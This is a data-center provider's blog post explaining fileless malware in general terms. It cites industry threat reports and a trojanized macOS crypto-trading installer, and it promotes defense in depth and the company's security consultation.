- Colocation
- Solutions
Data Center Services
- Support
- Company
Last Updated on July 6, 2022 by Sammen Qureshi
Let’s face it, securing your data isn’t as simple as downloading antivirus software anymore. To be frank, it hasn’t been for a while now. Cybercriminals are always searching for ways to undermine your first lines of defense, and if you’re not careful, you could be just one mis-click away from a security breach.
2017 changed the game with the introduction of fileless malware – a type of attack that easily bypasses every basic security defense. According to Symantec’s 2019 Internet Security Threat Report, fileless malware is on the rise and it’s one of the biggest digital infiltration threats to companies to date.
Traditional anti-malware software works by scanning the files on a computer’s storage drives. If the software finds files that match any of thousands of predetermined signatures, they are flagged as malware. Attackers are increasingly adapting to this method of defense by employing what is called a fileless attack, also known as a zero-footprint attack or non-malware attack. These attacks are categorized as low-observable characteristic (LOC) attacks, which means it is difficult for security solutions to identify and protect against them.
The Ponemon Institute estimates that fileless attacks are about 10 times more likely to succeed than file-based attacks.
In a 2021 Trend Micro Midyear Cybersecurity Report the first half of 2021 cybersecurity strongholds were surrounded by cybercriminals waiting to pounce at the sight of even the slightest crack in defenses to ravage valuable assets. Fileless malware is not dependent on files being installed or executed. Just like traditional malware attacks, a device is infected after a user-initiated action (such as clicking a malicious email link or downloading a compromised software package). In some cases, by abusing PowerShell, certain fileless variants have been seen moving laterally across networks, infecting other computers on the same network.
Without being stored in a file or installed directly on a machine, infections go straight into memory and the malicious content never touches the hard drive. And because fileless malware doesn’t write anything to disk like traditional malware does, it leaves behind no apparent trace of its existence which allows it to easily avoid detection by antivirus software.
According to the 2020 SonicWall Cyber Threat Report, cybercriminals are using new code obfuscation, sandbox detection and bypass techniques. This has resulted in a multitude of variants and the development of newer and more sophisticated exploit kits using fileless attacks instead of traditional payloads to a disk. While malware decreased 6% globally, SonicWall observed that most new threats masked their exploits within today’s most trusted files. In fact, Office (20.3%) and PDFs (17.4%) represent 38% of new threats detected by Capture ATP.
In December 2019, a fileless MacOS malware was discovered distributed as a piece of crypto trading software called UnionCryptoTrader.dmg. Attackers used a trojanized version of a legitimate crypto trading application installer file which was circulated from a crypto trading website called JMTTrading that offered a “smart cryptocurrency arbitrage trading platform.” At the time of writing this, the security research service VirusTotal shows that only about half of Mac OS anti-virus apps can detect the malware – almost a year after it was discovered!
Because fileless malware is difficult to identify, the most effective way to avoid being affected is to ensure that your servers and other business machines can’t be easily compromised in the first place. Fileless malware is sophisticated, but like all malware, it depends on the existence of software vulnerabilities to exploit systems. The best way to do this is to implement a multi-layered defense (defense in depth). By actively monitoring and accounting for the entire threat-lifecycle, you give yourself the absolute best chance against malicious attacks.
What are the components of a good defense in depth methodology? The key components involve software, hardware and business operation procedures. At a bare minimum, you will want:
Not all organizations have the resources to build and maintain these technologies and processes in-house. If your business has gaps in the areas of expertise to secure its infrastructure, consider a ColoHouse Security and Compliance Consultation with our team to ensure the infrastructure your business relies on is protected. Contact us today to learn more.